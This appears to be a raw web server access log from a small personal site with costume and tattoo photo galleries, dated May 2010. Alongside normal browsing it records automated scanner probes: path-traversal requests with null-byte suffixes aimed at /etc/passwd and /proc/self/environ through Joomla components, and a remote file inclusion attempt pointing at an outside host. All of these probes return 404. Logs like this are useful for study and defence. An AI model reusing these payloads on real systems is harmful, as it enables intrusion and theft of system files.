69.163.151.185 - - [28/May/2010:09:22:25 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.net../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.163.151.185 - - [28/May/2010:09:22:25 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.net../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.163.151.185 - - [28/May/2010:09:22:36 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.163.151.185 - - [28/May/2010:09:22:36 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.163.151.185 - - [28/May/2010:09:22:36 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.163.151.185 - - [28/May/2010:09:23:47 -0500] "GET /logs/access_log.1273622400/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.net../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
122.249.22.58 - - [28/May/2010:09:24:33 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
122.249.22.58 - - [28/May/2010:09:24:34 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
122.249.22.58 - - [28/May/2010:09:24:35 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
80.179.153.117 - - [28/May/2010:09:25:23 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.net../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
80.179.153.117 - - [28/May/2010:09:25:23 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.net../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
80.179.153.117 - - [28/May/2010:09:25:24 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.net../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
78.85.175.68 - - [28/May/2010:09:27:13 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://ru.wikipedia.org/wiki/%D0%9A%D0%BE%D1%81%D1%82%D1%8E%D0%BC""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:16 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:16 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:16 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:16 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:17 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:19 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:22 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:22 -0500] "GET /costume/049_JPG%20copy.jpg HTTP/1.1" 200 46261 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:22 -0500] "GET /costume/050_JPG%20copy.jpg HTTP/1.1" 200 41544 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:23 -0500] "GET /costume/051_JPG%20copy.jpg HTTP/1.1" 200 46644 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:23 -0500] "GET /costume/052_JPG%20copy.jpg HTTP/1.1" 200 45569 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:23 -0500] "GET /costume/055_JPG%20copy.jpg HTTP/1.1" 200 47426 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:23 -0500] "GET /costume/056_JPG%20copy.jpg HTTP/1.1" 200 45237 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:23 -0500] "GET /costume/054_JPG%20copy.jpg HTTP/1.1" 200 42090 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:23 -0500] "GET /costume/057_JPG%20copy.jpg HTTP/1.1" 200 45023 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:23 -0500] "GET /costume/053_JPG%20copy.jpg HTTP/1.1" 200 47421 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:23 -0500] "GET /costume/058_JPG%20copy.jpg HTTP/1.1" 200 47636 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:23 -0500] "GET /costume/059_JPG%20copy.jpg HTTP/1.1" 200 43881 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
78.85.175.68 - - [28/May/2010:09:27:23 -0500] "GET /costume/060_JPG%20copy.jpg HTTP/1.1" 200 44423 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
80.179.153.117 - - [28/May/2010:09:27:26 -0500] "GET /logs/access_log.1273622400/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.net../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
78.85.175.68 - - [28/May/2010:09:27:47 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19"
76.12.147.249 - - [28/May/2010:09:27:56 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
69.163.151.185 - - [28/May/2010:09:28:12 -0500] "GET /logs/access_log.1273622400/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.179.153.117 - - [28/May/2010:09:29:50 -0500] "GET /logs/access_log.1273622400/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
216.127.70.140 - - [28/May/2010:09:29:59 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:09:29:59 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?include_path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:09:29:59 -0500] "GET //poll/poll_ssi.php?include_path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:09:29:59 -0500] "GET //poll/poll_ssi.php?include_path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:09:29:59 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
216.127.70.140 - - [28/May/2010:09:29:59 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://superseductionpower.com/crjames/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
87.250.255.243 - - [28/May/2010:09:31:50 -0500] "GET /logs/access_log.1220659200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.49.28.194 - - [28/May/2010:09:32:53 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
65.49.28.194 - - [28/May/2010:09:32:53 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
122.249.22.58 - - [28/May/2010:09:33:09 -0500] "GET /logs/access_log.1273622400/index2.php?option=com_myblog&Itemid=12&task=%20com_myblog%20.com../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
109.54.25.5 - - [28/May/2010:09:33:57 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.it/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&h=228&w=271&sz=17&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dbert%2Bgrimm%2Btattoo%2Bflash&hl=it&usg=__Row1Cqh0sBmtViLRFfiqfPCtYAo=&ei=aNT_S-2tIaKUOKOesNoO&sa=X&oi=image_result&resnum=5&ct=image&ved=0CDkQ9QEwBA""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:33:58 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:08 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:18 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:18 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:18 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:18 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:18 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:19 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:19 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:19 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:19 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:20 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:34:20 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:41 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:42 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:43 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:43 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:43 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:44 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:44 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:44 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:45 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:45 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:36:45 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
216.97.225.115 - - [28/May/2010:09:37:10 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.814"
216.97.225.115 - - [28/May/2010:09:37:11 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
109.54.25.5 - - [28/May/2010:09:37:17 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:18 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:18 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:19 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:19 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:19 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:19 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:21 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:21 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:21 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:21 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:58 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:37:59 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:00 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:00 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:00 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:01 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:01 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:01 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:02 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:02 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:02 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
217.27.240.120 - - [28/May/2010:09:38:14 -0500] "GET /logs/index1.php?choix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
217.27.240.120 - - [28/May/2010:09:38:15 -0500] "GET /index1.php?choix=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
109.54.25.5 - - [28/May/2010:09:38:37 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
109.54.25.5 - - [28/May/2010:09:38:37 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
